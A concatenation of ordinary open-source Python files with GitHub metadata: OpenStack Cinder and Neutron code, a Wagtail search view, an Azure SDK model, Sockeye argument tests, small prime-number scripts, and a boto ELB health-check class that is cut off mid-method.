db.volume_type_create(context.get_admin_context(), volume_type)
body = {"encryption": {'cipher': 'cipher',
'key_size': 128,
'control_location': 'front-end',
'provider': 'fake_provider',
'volume_type_id': volume_type['id']}}
# Create encryption with volume type, and test with GET
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res = self._get_response(volume_type, req_method='GET',
req_headers='application/json',
url='/v2/fake/types/%s/encryption')
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
self.assertEqual(volume_type['id'], res_dict['volume_type_id'])
# Create volumes with the volume type
db.volume_create(context.get_admin_context(),
{'id': 'fake_id',
'display_description': 'Test Desc',
'size': 20,
'status': 'creating',
'instance_uuid': None,
'host': 'dummy',
'volume_type_id': volume_type['id']})
db.volume_create(context.get_admin_context(),
{'id': 'fake_id2',
'display_description': 'Test Desc2',
'size': 2,
'status': 'creating',
'instance_uuid': None,
'host': 'dummy',
'volume_type_id': volume_type['id']})
# Delete, and test that there is an error since volumes exist
res = self._get_response(volume_type, req_method='DELETE',
req_headers='application/json',
url='/v2/fake/types/%s/encryption/provider')
self.assertEqual(400, res.status_code)
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': 'Cannot delete encryption specs. '
'Volume type in use.'
}
}
self.assertEqual(expected, res_dict)
# Delete the volumes
db.volume_destroy(context.get_admin_context(), 'fake_id')
db.volume_destroy(context.get_admin_context(), 'fake_id2')
# Delete, and test that get returns nothing
res = self._get_response(volume_type, req_method='DELETE',
req_headers='application/json',
url='/v2/fake/types/%s/encryption/provider')
self.assertEqual(202, res.status_code)
self.assertEqual(0, len(res.body))
res = self._get_response(volume_type, req_method='GET',
req_headers='application/json',
url='/v2/fake/types/%s/encryption')
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
self.assertEqual({}, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_update_item(self):
volume_type = self._default_volume_type
# Create Encryption Specs
create_body = {"encryption": {'cipher': 'cipher',
'control_location': 'front-end',
'key_size': 128,
'provider': 'fake_provider',
'volume_type_id': volume_type['id']}}
self._create_type_and_encryption(volume_type, create_body)
# Update Encryption Specs
update_body = {"encryption": {'key_size': 512,
'provider': 'fake_provider2'}}
res = self.\
_get_response(volume_type, req_method='PUT',
req_body=json.dumps(update_body),
req_headers='application/json',
url='/v2/fake/types/%s/encryption/fake_type_id')
res_dict = json.loads(res.body)
self.assertEqual(512, res_dict['encryption']['key_size'])
self.assertEqual('fake_provider2', res_dict['encryption']['provider'])
# Get Encryption Specs
res = self._get_response(volume_type)
res_dict = json.loads(res.body)
# Confirm Encryption Specs
self.assertEqual(512, res_dict['key_size'])
self.assertEqual('fake_provider2', res_dict['provider'])
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def _encryption_update_bad_body(self, update_body, msg):
# Create Volume Type and Encryption
volume_type = self._default_volume_type
res = self._create_type_and_encryption(volume_type)
# Update Encryption
res = self.\
_get_response(volume_type, req_method='PUT',
req_body=json.dumps(update_body),
req_headers='application/json',
url='/v2/fake/types/%s/encryption/fake_type_id')
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': (msg)
}
}
# Confirm Failure
self.assertEqual(expected, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_update_too_many_items(self):
update_body = {"encryption": {'key_size': 512},
"encryption2": {'key_size': 256}}
msg = 'Request body contains too many items.'
self._encryption_update_bad_body(update_body, msg)
def test_update_key_size_non_integer(self):
update_body = {"encryption": {'key_size': 'abc'}}
msg = 'Invalid input received: key_size must be an integer'
self._encryption_update_bad_body(update_body, msg)
def test_update_item_invalid_body(self):
update_body = {"key_size": "value1"}
msg = 'Update body is not valid. It must contain "encryption."'
self._encryption_update_bad_body(update_body, msg)
def _encryption_empty_update(self, update_body):
msg = 'Request body empty.'
self._encryption_update_bad_body(update_body, msg)
def test_update_no_body(self):
self._encryption_empty_update(update_body=None)
def test_update_empty_body(self):
self._encryption_empty_update(update_body={})
def test_update_with_volume_in_use(self):
# Create the volume type and encryption
volume_type = self._default_volume_type
self._create_type_and_encryption(volume_type)
# Create a volume with the volume type
db.volume_create(context.get_admin_context(),
{'id': 'fake_id',
'display_description': 'Test Desc',
'size': 20,
'status': 'creating',
'instance_uuid': None,
'host': 'dummy',
'volume_type_id': volume_type['id']})
# Get the Encryption
res = self._get_response(volume_type)
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
self.assertEqual(volume_type['id'], res_dict['volume_type_id'])
# Update, and test that there is an error since volumes exist
update_body = {"encryption": {'key_size': 512}}
res = self.\
_get_response(volume_type, req_method='PUT',
req_body=json.dumps(update_body),
req_headers='application/json',
url='/v2/fake/types/%s/encryption/fake_type_id')
self.assertEqual(400, res.status_code)
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': 'Cannot update encryption specs. '
'Volume type in use.'
}
}
self.assertEqual(expected, res_dict)
|
{
"content_hash": "6d974bb44aadc36559a7b97f0fb99718",
"timestamp": "",
"source": "github",
"line_count": 591,
"max_line_length": 79,
"avg_line_length": 40.653130287648054,
"alnum_prop": 0.5367934737367851,
"repo_name": "alex8866/cinder",
"id": "9bf1f9852acadaa5d51889db0e2f208c25d82b43",
"size": "24701",
"binary": false,
"copies": "12",
"ref": "refs/heads/f22-patches",
"path": "cinder/tests/api/contrib/test_volume_type_encryption.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PLpgSQL",
"bytes": "9824"
},
{
"name": "Python",
"bytes": "8519246"
},
{
"name": "Shell",
"bytes": "8429"
}
],
"symlink_target": ""
}
|
def is_prime(n):
"""Returns True is n is prime, False if not"""
for i in range(2,n-1):
if n%i == 0:
return False
return True
def all_primes(n):
primes = []
for number in range(1,n):
if is_prime(number):
primes.append(number)
return primes
|
{
"content_hash": "c0b691dfd31b88d824176624a93d6dcd",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 49,
"avg_line_length": 22.615384615384617,
"alnum_prop": 0.5578231292517006,
"repo_name": "Serulab/Py4Bio",
"id": "80f9bfb2f2298adca4bb2fbb9fa702375e6dc5db",
"size": "294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/ch6/allprimes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "616939"
},
{
"name": "Jupyter Notebook",
"bytes": "1260113"
},
{
"name": "Python",
"bytes": "533666"
},
{
"name": "Smarty",
"bytes": "1665"
},
{
"name": "TSQL",
"bytes": "3276"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.shortcuts import render
from django.http import JsonResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from wagtail.wagtailcore import models
from wagtail.wagtailsearch.models import Query
def search(
request,
template=None,
template_ajax=None,
results_per_page=10,
use_json=False,
json_attrs=['title', 'url'],
show_unpublished=False,
search_title_only=False,
extra_filters={},
path=None):
# Get default templates
if template is None:
if hasattr(settings, 'WAGTAILSEARCH_RESULTS_TEMPLATE'):
template = settings.WAGTAILSEARCH_RESULTS_TEMPLATE
else:
template = 'wagtailsearch/search_results.html'
if template_ajax is None:
if hasattr(settings, 'WAGTAILSEARCH_RESULTS_TEMPLATE_AJAX'):
template_ajax = settings.WAGTAILSEARCH_RESULTS_TEMPLATE_AJAX
else:
template_ajax = template
# Get query string and page from GET paramters
query_string = request.GET.get('q', '')
page = request.GET.get('page', request.GET.get('p', 1))
# Search
if query_string != '':
pages = models.Page.objects.filter(path__startswith=(path or request.site.root_page.path))
if not show_unpublished:
pages = pages.live()
if extra_filters:
pages = pages.filter(**extra_filters)
if search_title_only:
search_results = pages.search(query_string, fields=['title'])
else:
search_results = pages.search(query_string)
# Get query object
query = Query.get(query_string)
# Add hit
query.add_hit()
# Pagination
paginator = Paginator(search_results, results_per_page)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
else:
query = None
search_results = None
if use_json:
# Return a json response
if search_results:
search_results_json = []
for result in search_results:
result_specific = result.specific
search_results_json.append(dict(
(attr, getattr(result_specific, attr))
for attr in json_attrs
if hasattr(result_specific, attr)
))
return JsonResponse(search_results_json, safe=False)
else:
return JsonResponse([], safe=False)
else:
# Render a template
if request.is_ajax() and template_ajax:
template = template_ajax
return render(request, template, dict(
query_string=query_string,
search_results=search_results,
is_ajax=request.is_ajax(),
query=query
))
|
{
"content_hash": "3a799ad261f4ef9bceaa36670b6d9e35",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 98,
"avg_line_length": 30.8265306122449,
"alnum_prop": 0.5958291956305859,
"repo_name": "JoshBarr/wagtail",
"id": "1680b4a21f5977059ee53208da5f58ce9fb10b6a",
"size": "3021",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "wagtail/wagtailsearch/views/frontend.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "152464"
},
{
"name": "HTML",
"bytes": "252508"
},
{
"name": "JavaScript",
"bytes": "94840"
},
{
"name": "Makefile",
"bytes": "548"
},
{
"name": "Python",
"bytes": "1839807"
},
{
"name": "Shell",
"bytes": "7388"
}
],
"symlink_target": ""
}
|
from neutron.api.v2 import attributes as attrs
from neutron.common import exceptions as n_exc
from neutron import context
from neutron.db import api as qdbapi
from neutron.db.loadbalancer import loadbalancer_db as ldb
from neutron.db import servicetype_db as st_db
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
from neutron.services.loadbalancer import agent_scheduler
from neutron.services import provider_configuration as pconf
from neutron.services import service_base
LOG = logging.getLogger(__name__)
class LoadBalancerPlugin(ldb.LoadBalancerPluginDb,
agent_scheduler.LbaasAgentSchedulerDbMixin):
"""Implementation of the Neutron Loadbalancer Service Plugin.
This class manages the workflow of LBaaS request/response.
Most DB related works are implemented in class
loadbalancer_db.LoadBalancerPluginDb.
"""
supported_extension_aliases = ["lbaas",
"lbaas_agent_scheduler",
"service-type"]
# lbaas agent notifiers to handle agent update operations;
# can be updated by plugin drivers while loading;
# will be extracted by neutron manager when loading service plugins;
agent_notifiers = {}
def __init__(self):
"""Initialization for the loadbalancer service plugin."""
qdbapi.register_models()
self.service_type_manager = st_db.ServiceTypeManager.get_instance()
self._load_drivers()
def _load_drivers(self):
"""Loads plugin-drivers specified in configuration."""
self.drivers, self.default_provider = service_base.load_drivers(
constants.LOADBALANCER, self)
# we're at the point when extensions are not loaded yet
# so prevent policy from being loaded
ctx = context.get_admin_context(load_admin_roles=False)
# stop service in case provider was removed, but resources were not
self._check_orphan_pool_associations(ctx, self.drivers.keys())
def _check_orphan_pool_associations(self, context, provider_names):
"""Checks remaining associations between pools and providers.
If admin has not undeployed resources with provider that was deleted
from configuration, neutron service is stopped. Admin must delete
resources prior to removing providers from configuration.
"""
pools = self.get_pools(context)
lost_providers = set([pool['provider'] for pool in pools
if pool['provider'] not in provider_names])
# resources are left without provider - stop the service
if lost_providers:
msg = _("Delete associated loadbalancer pools before "
"removing providers %s") % list(lost_providers)
LOG.exception(msg)
raise SystemExit(msg)
def _get_driver_for_provider(self, provider):
if provider in self.drivers:
return self.drivers[provider]
# raise if not associated (should never be reached)
raise n_exc.Invalid(_("Error retrieving driver for provider %s") %
provider)
def _get_driver_for_pool(self, context, pool_id):
pool = self.get_pool(context, pool_id)
try:
return self.drivers[pool['provider']]
except KeyError:
raise n_exc.Invalid(_("Error retrieving provider for pool %s") %
pool_id)
def get_plugin_type(self):
return constants.LOADBALANCER
def get_plugin_description(self):
return "Neutron LoadBalancer Service Plugin"
def create_vip(self, context, vip):
v = super(LoadBalancerPlugin, self).create_vip(context, vip)
driver = self._get_driver_for_pool(context, v['pool_id'])
driver.create_vip(context, v)
return v
def update_vip(self, context, id, vip):
if 'status' not in vip['vip']:
vip['vip']['status'] = constants.PENDING_UPDATE
old_vip = self.get_vip(context, id)
v = super(LoadBalancerPlugin, self).update_vip(context, id, vip)
driver = self._get_driver_for_pool(context, v['pool_id'])
driver.update_vip(context, old_vip, v)
return v
def _delete_db_vip(self, context, id):
# proxy the call until plugin inherits from DBPlugin
super(LoadBalancerPlugin, self).delete_vip(context, id)
def delete_vip(self, context, id):
self.update_status(context, ldb.Vip,
id, constants.PENDING_DELETE)
v = self.get_vip(context, id)
driver = self._get_driver_for_pool(context, v['pool_id'])
driver.delete_vip(context, v)
def _get_provider_name(self, context, pool):
if ('provider' in pool and
pool['provider'] != attrs.ATTR_NOT_SPECIFIED):
provider_name = pconf.normalize_provider_name(pool['provider'])
self.validate_provider(provider_name)
return provider_name
else:
if not self.default_provider:
raise pconf.DefaultServiceProviderNotFound(
service_type=constants.LOADBALANCER)
return self.default_provider
def create_pool(self, context, pool):
provider_name = self._get_provider_name(context, pool['pool'])
p = super(LoadBalancerPlugin, self).create_pool(context, pool)
self.service_type_manager.add_resource_association(
context,
constants.LOADBALANCER,
provider_name, p['id'])
#need to add provider name to pool dict,
#because provider was not known to db plugin at pool creation
p['provider'] = provider_name
driver = self.drivers[provider_name]
driver.create_pool(context, p)
return p
def update_pool(self, context, id, pool):
if 'status' not in pool['pool']:
pool['pool']['status'] = constants.PENDING_UPDATE
old_pool = self.get_pool(context, id)
p = super(LoadBalancerPlugin, self).update_pool(context, id, pool)
driver = self._get_driver_for_provider(p['provider'])
driver.update_pool(context, old_pool, p)
return p
def _delete_db_pool(self, context, id):
# proxy the call until plugin inherits from DBPlugin
# rely on uuid uniqueness:
with context.session.begin(subtransactions=True):
self.service_type_manager.del_resource_associations(context, [id])
super(LoadBalancerPlugin, self).delete_pool(context, id)
def delete_pool(self, context, id):
self.update_status(context, ldb.Pool,
id, constants.PENDING_DELETE)
p = self.get_pool(context, id)
driver = self._get_driver_for_provider(p['provider'])
driver.delete_pool(context, p)
def create_member(self, context, member):
m = super(LoadBalancerPlugin, self).create_member(context, member)
driver = self._get_driver_for_pool(context, m['pool_id'])
driver.create_member(context, m)
return m
def update_member(self, context, id, member):
if 'status' not in member['member']:
member['member']['status'] = constants.PENDING_UPDATE
old_member = self.get_member(context, id)
m = super(LoadBalancerPlugin, self).update_member(context, id, member)
driver = self._get_driver_for_pool(context, m['pool_id'])
driver.update_member(context, old_member, m)
return m
def _delete_db_member(self, context, id):
# proxy the call until plugin inherits from DBPlugin
super(LoadBalancerPlugin, self).delete_member(context, id)
def delete_member(self, context, id):
self.update_status(context, ldb.Member,
id, constants.PENDING_DELETE)
m = self.get_member(context, id)
driver = self._get_driver_for_pool(context, m['pool_id'])
driver.delete_member(context, m)
def create_health_monitor(self, context, health_monitor):
hm = super(LoadBalancerPlugin, self).create_health_monitor(
context,
health_monitor
)
return hm
def update_health_monitor(self, context, id, health_monitor):
old_hm = self.get_health_monitor(context, id)
hm = super(LoadBalancerPlugin, self).update_health_monitor(
context,
id,
health_monitor
)
with context.session.begin(subtransactions=True):
qry = context.session.query(
ldb.PoolMonitorAssociation
).filter_by(monitor_id=hm['id']).join(ldb.Pool)
for assoc in qry:
driver = self._get_driver_for_pool(context, assoc['pool_id'])
driver.update_health_monitor(context, old_hm,
hm, assoc['pool_id'])
return hm
def _delete_db_pool_health_monitor(self, context, hm_id, pool_id):
super(LoadBalancerPlugin, self).delete_pool_health_monitor(context,
hm_id,
pool_id)
def _delete_db_health_monitor(self, context, id):
super(LoadBalancerPlugin, self).delete_health_monitor(context, id)
def delete_health_monitor(self, context, id):
with context.session.begin(subtransactions=True):
hm = self.get_health_monitor(context, id)
qry = context.session.query(
ldb.PoolMonitorAssociation
).filter_by(monitor_id=id).join(ldb.Pool)
for assoc in qry:
driver = self._get_driver_for_pool(context, assoc['pool_id'])
driver.delete_pool_health_monitor(context,
hm,
assoc['pool_id'])
super(LoadBalancerPlugin, self).delete_health_monitor(context, id)
def create_pool_health_monitor(self, context, health_monitor, pool_id):
retval = super(LoadBalancerPlugin, self).create_pool_health_monitor(
context,
health_monitor,
pool_id
)
monitor_id = health_monitor['health_monitor']['id']
hm = self.get_health_monitor(context, monitor_id)
driver = self._get_driver_for_pool(context, pool_id)
driver.create_pool_health_monitor(context, hm, pool_id)
return retval
def delete_pool_health_monitor(self, context, id, pool_id):
self.update_pool_health_monitor(context, id, pool_id,
constants.PENDING_DELETE)
hm = self.get_health_monitor(context, id)
driver = self._get_driver_for_pool(context, pool_id)
driver.delete_pool_health_monitor(context, hm, pool_id)
def stats(self, context, pool_id):
driver = self._get_driver_for_pool(context, pool_id)
stats_data = driver.stats(context, pool_id)
# if we get something from the driver -
# update the db and return the value from db
# else - return what we have in db
if stats_data:
super(LoadBalancerPlugin, self).update_pool_stats(
context,
pool_id,
stats_data
)
return super(LoadBalancerPlugin, self).stats(context,
pool_id)
def populate_vip_graph(self, context, vip):
"""Populate the vip with: pool, members, healthmonitors."""
pool = self.get_pool(context, vip['pool_id'])
vip['pool'] = pool
vip['members'] = [self.get_member(context, member_id)
for member_id in pool['members']]
vip['health_monitors'] = [self.get_health_monitor(context, hm_id)
for hm_id in pool['health_monitors']]
return vip
def validate_provider(self, provider):
if provider not in self.drivers:
raise pconf.ServiceProviderNotFound(
provider=provider, service_type=constants.LOADBALANCER)
|
{
"content_hash": "b9c29e75a905fa9b60e96d52b617e130",
"timestamp": "",
"source": "github",
"line_count": 285,
"max_line_length": 78,
"avg_line_length": 42.80701754385965,
"alnum_prop": 0.6092622950819672,
"repo_name": "citrix-openstack-build/neutron",
"id": "ea7eff3aac6da321fd4563e8ca694febd2978f0a",
"size": "12847",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "neutron/services/loadbalancer/plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6817315"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class WorkflowTriggerCallbackUrl(Model):
"""The workflow trigger callback URL.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar value: Gets the workflow trigger callback URL.
:vartype value: str
:ivar method: Gets the workflow trigger callback URL HTTP method.
:vartype method: str
:ivar base_path: Gets the workflow trigger callback URL base path.
:vartype base_path: str
:ivar relative_path: Gets the workflow trigger callback URL relative path.
:vartype relative_path: str
:param relative_path_parameters: Gets the workflow trigger callback URL
relative path parameters.
:type relative_path_parameters: list of str
:param queries: Gets the workflow trigger callback URL query parameters.
:type queries: :class:`WorkflowTriggerListCallbackUrlQueries
<azure.mgmt.logic.models.WorkflowTriggerListCallbackUrlQueries>`
"""
_validation = {
'value': {'readonly': True},
'method': {'readonly': True},
'base_path': {'readonly': True},
'relative_path': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'method': {'key': 'method', 'type': 'str'},
'base_path': {'key': 'basePath', 'type': 'str'},
'relative_path': {'key': 'relativePath', 'type': 'str'},
'relative_path_parameters': {'key': 'relativePathParameters', 'type': '[str]'},
'queries': {'key': 'queries', 'type': 'WorkflowTriggerListCallbackUrlQueries'},
}
def __init__(self, relative_path_parameters=None, queries=None):
self.value = None
self.method = None
self.base_path = None
self.relative_path = None
self.relative_path_parameters = relative_path_parameters
self.queries = queries
|
{
"content_hash": "8449689104faa12a479ea32b5e1757ee",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 87,
"avg_line_length": 39.25,
"alnum_prop": 0.6523354564755839,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "e2d2b9f9b624ab111c080a566dd03725ffb996af",
"size": "2358",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "azure-mgmt-logic/azure/mgmt/logic/models/workflow_trigger_callback_url.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
}
|
import pytest
import sockeye.constants as C
import sockeye.arguments as arguments
import argparse
@pytest.mark.parametrize("test_params, expected_params", [
# mandatory parameters
('--source test_src --target test_tgt '
'--validation-source test_validation_src --validation-target test_validation_tgt '
'--output test_output',
dict(source='test_src', target='test_tgt',
validation_source='test_validation_src', validation_target='test_validation_tgt',
output='test_output', overwrite_output=False,
source_vocab=None, target_vocab=None, use_tensorboard=False, quiet=False)),
# all parameters
('--source test_src --target test_tgt '
'--validation-source test_validation_src --validation-target test_validation_tgt '
'--output test_output '
'--source-vocab test_src_vocab --target-vocab test_tgt_vocab '
'--use-tensorboard --overwrite-output --quiet',
dict(source='test_src', target='test_tgt',
validation_source='test_validation_src', validation_target='test_validation_tgt',
output='test_output', overwrite_output=True,
source_vocab='test_src_vocab', target_vocab='test_tgt_vocab', use_tensorboard=True, quiet=True)),
# short parameters
('-s test_src -t test_tgt '
'-vs test_validation_src -vt test_validation_tgt '
'-o test_output -q',
dict(source='test_src', target='test_tgt',
validation_source='test_validation_src', validation_target='test_validation_tgt',
output='test_output', overwrite_output=False,
source_vocab=None, target_vocab=None, use_tensorboard=False, quiet=True))
])
def test_io_args(test_params, expected_params):
_test_args(test_params, expected_params, arguments.add_io_args)
@pytest.mark.parametrize("test_params, expected_params", [
('', dict(device_ids=[-1], use_cpu=False, disable_device_locking=False, lock_dir='/tmp')),
('--device-ids 1 2 3 --use-cpu --disable-device-locking --lock-dir test_dir',
dict(device_ids=[1, 2, 3], use_cpu=True, disable_device_locking=True, lock_dir='test_dir'))
])
def test_device_args(test_params, expected_params):
_test_args(test_params, expected_params, arguments.add_device_args)
@pytest.mark.parametrize("test_params, expected_params", [
('', dict(params=None, num_words=50000, num_words_source=None, num_words_target=None, word_min_count=1,
rnn_num_layers=1, rnn_cell_type=C.LSTM_TYPE, rnn_num_hidden=1024,
rnn_residual_connections=False, num_embed=512, num_embed_source=None, num_embed_target=None,
attention_type='mlp', attention_num_hidden=None, attention_coverage_type='count',
attention_coverage_num_hidden=1,
lexical_bias=None, learn_lexical_bias=False, weight_tying=False, max_seq_len=100,
max_seq_len_source=None, max_seq_len_target=None,
attention_use_prev_word=False, context_gating=False, layer_normalization=False,
encoder=C.RNN_NAME, conv_embed_max_filter_width=8,
conv_embed_num_filters=(200, 200, 250, 250, 300, 300, 300, 300),
conv_embed_num_highway_layers=4, conv_embed_pool_stride=5)),
('--params test_params --num-words 10 --num-words-source 11 --num-words-target 12 --word-min-count 10 '
'--rnn-num-layers 10 --rnn-cell-type gru '
'--rnn-num-hidden 512 --rnn-residual-connections --num-embed 1024 --num-embed-source 10 --num-embed-target 10 '
'--attention-type dot --attention-num-hidden 10 --attention-coverage-type tanh '
'--attention-coverage-num-hidden 10 --lexical-bias test_bias --learn-lexical-bias --weight-tying '
'--max-seq-len 10 --max-seq-len-source 11 --max-seq-len-target 12 --attention-use-prev-word --context-gating --layer-normalization '
'--encoder rnn-with-conv-embed --conv-embed-max-filter-width 2 --conv-embed-num-filters 100 100 '
'--conv-embed-num-highway-layers 2 --conv-embed-pool-stride 2',
dict(params='test_params', num_words=10, num_words_source=11, num_words_target=12,
word_min_count=10, rnn_num_layers=10, rnn_cell_type=C.GRU_TYPE,
rnn_num_hidden=512,
rnn_residual_connections=True, num_embed=1024, num_embed_source=10, num_embed_target=10,
attention_type='dot', attention_num_hidden=10, attention_coverage_type='tanh',
attention_coverage_num_hidden=10,
lexical_bias='test_bias', learn_lexical_bias=True, weight_tying=True, max_seq_len=10,
max_seq_len_source=11, max_seq_len_target=12,
attention_use_prev_word=True, context_gating=True, layer_normalization=True,
encoder=C.RNN_WITH_CONV_EMBED_NAME, conv_embed_max_filter_width=2, conv_embed_num_filters=[100, 100],
conv_embed_num_highway_layers=2, conv_embed_pool_stride=2))
])
def test_model_parameters(test_params, expected_params):
_test_args(test_params, expected_params, arguments.add_model_parameters)
@pytest.mark.parametrize("test_params, expected_params", [
('', dict(batch_size=64, fill_up='replicate', no_bucketing=False, bucket_width=10, loss=C.CROSS_ENTROPY,
smoothed_cross_entropy_alpha=0.3, normalize_loss=False, metrics=[C.PERPLEXITY],
optimized_metric=C.PERPLEXITY,
max_updates=-1, checkpoint_frequency=1000, max_num_checkpoint_not_improved=8, dropout=0.0,
optimizer='adam', min_num_epochs=0,
initial_learning_rate=0.0003, weight_decay=0.0, momentum=None, clip_gradient=1.0,
learning_rate_scheduler_type='plateau-reduce', learning_rate_reduce_factor=0.5,
learning_rate_reduce_num_not_improved=3, learning_rate_half_life=10, use_fused_rnn=False,
rnn_forget_bias=0.0, rnn_h2h_init=C.RNN_INIT_ORTHOGONAL, monitor_bleu=0, seed=13,
keep_last_params=-1)),
('--batch-size 128 --fill-up test_fill_up --no-bucketing --bucket-width 20 --loss smoothed-cross-entropy '
'--smoothed-cross-entropy-alpha 1.0 --normalize-loss --metrics perplexity accuracy '
'--optimized-metric bleu --max-updates 10 --checkpoint-frequency 10 --min-num-epochs 10 '
'--max-num-checkpoint-not-improved 16 --dropout 1.0 --optimizer sgd --initial-learning-rate 1.0 '
'--weight-decay 1.0 --momentum 1.0 --clip-gradient 2.0 --learning-rate-scheduler-type fixed-rate-inv-t '
'--learning-rate-reduce-factor 1.0 --learning-rate-reduce-num-not-improved 10 --learning-rate-half-life 20 '
'--use-fused-rnn --rnn-forget-bias 1.0 --rnn-h2h-init orthogonal_stacked --monitor-bleu 10 --seed 10 '
'--keep-last-params 50'
,
dict(batch_size=128, fill_up='test_fill_up', no_bucketing=True, bucket_width=20, loss=C.SMOOTHED_CROSS_ENTROPY,
smoothed_cross_entropy_alpha=1.0, normalize_loss=True, metrics=[C.PERPLEXITY, C.ACCURACY],
optimized_metric=C.BLEU, min_num_epochs=10,
max_updates=10, checkpoint_frequency=10, max_num_checkpoint_not_improved=16, dropout=1.0, optimizer='sgd',
initial_learning_rate=1.0, weight_decay=1.0, momentum=1.0, clip_gradient=2.0,
learning_rate_scheduler_type='fixed-rate-inv-t', learning_rate_reduce_factor=1.0,
learning_rate_reduce_num_not_improved=10, learning_rate_half_life=20.0, use_fused_rnn=True,
rnn_forget_bias=1.0, rnn_h2h_init=C.RNN_INIT_ORTHOGONAL_STACKED, monitor_bleu=10, seed=10,
keep_last_params=50)),
])
def test_training_arg(test_params, expected_params):
_test_args(test_params, expected_params, arguments.add_training_args)
@pytest.mark.parametrize("test_params, expected_params", [
('--models m1 m2 m3', dict(input=None, output=None, models=['m1', 'm2', 'm3'],
checkpoints=None, beam_size=5, ensemble_mode='linear',
max_input_len=None, softmax_temperature=None, output_type='translation',
sure_align_threshold=0.9)),
('--input test_input --output test_output --models m1 m2 m3 --checkpoints 1 2 3 --beam-size 10 '
'--ensemble-mode log_linear --max-input-len 10 --softmax-temperature 1.0 '
'--output-type translation_with_alignments --sure-align-threshold 1.0',
dict(input='test_input', output='test_output', models=['m1', 'm2', 'm3'],
checkpoints=[1, 2, 3], beam_size=10, ensemble_mode='log_linear',
max_input_len=10, softmax_temperature=1.0,
output_type='translation_with_alignments', sure_align_threshold=1.0)),
('-i test_input -o test_output -m m1 m2 m3 -c 1 2 3 -b 10 -n 10',
dict(input='test_input', output='test_output', models=['m1', 'm2', 'm3'],
checkpoints=[1, 2, 3], beam_size=10, ensemble_mode='linear',
max_input_len=10, softmax_temperature=None, output_type='translation', sure_align_threshold=0.9))
])
def test_inference_args(test_params, expected_params):
_test_args(test_params, expected_params, arguments.add_inference_args)
def _test_args(test_params, expected_params, args_func):
test_parser = argparse.ArgumentParser()
args_func(test_parser)
parsed_params = test_parser.parse_args(test_params.split())
assert dict(vars(parsed_params)) == expected_params
|
{
"content_hash": "cbed860ec9c6239892b0c522eeccd560",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 137,
"avg_line_length": 62.99315068493151,
"alnum_prop": 0.6700010873110797,
"repo_name": "KellenSunderland/sockeye",
"id": "b4dd0caf302fe278c39a2b5596493c7cb332115c",
"size": "9763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/unit/test_arguments.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "467469"
},
{
"name": "Shell",
"bytes": "1662"
}
],
"symlink_target": ""
}
|
from ipc import vetor
primos = vetor.gera_primos()
print(primos)
|
{
"content_hash": "9db6bab1c3aeb478be74e9b357d6cfcd",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 28,
"avg_line_length": 21.666666666666668,
"alnum_prop": 0.7692307692307693,
"repo_name": "jucimarjr/IPC_2017-1",
"id": "3dbdbe8567627ed06daebe2040fcca2d7889b313",
"size": "697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lista08/lista08_lista02_questao14.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "2978"
},
{
"name": "Python",
"bytes": "525677"
}
],
"symlink_target": ""
}
|
class HealthCheck(object):
"""
Represents an EC2 Access Point Health Check. See
:ref:`elb-configuring-a-health-check` for a walkthrough on configuring
load balancer health checks.
"""
def __init__(self, access_point=None, interval=30, target=None,
healthy_threshold=3, timeout=5, unhealthy_threshold=5):
"""
:ivar str access_point: The name of the load balancer this
health check is associated with.
:ivar int interval: Specifies how many seconds there are between
health checks.
:ivar str target: Determines what to check on an instance. See the
Amazon HealthCheck_ documentation for possible Target values.
.. _HealthCheck: http://docs.amazonwebservices.com/ElasticLoadBalancing/latest/APIReference/API_HealthCheck.html
"""
self.access_point = access_point
self.interval = interval
self.target = target
self.healthy_threshold = healthy_threshold
self.timeout = timeout
self.unhealthy_threshold = unhealthy_threshold
def __repr__(self):
return 'HealthCheck:%s' % self.target
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Interval':
self.interval = int(value)
elif name == 'Target':
self.target = value
elif name == 'HealthyThreshold':
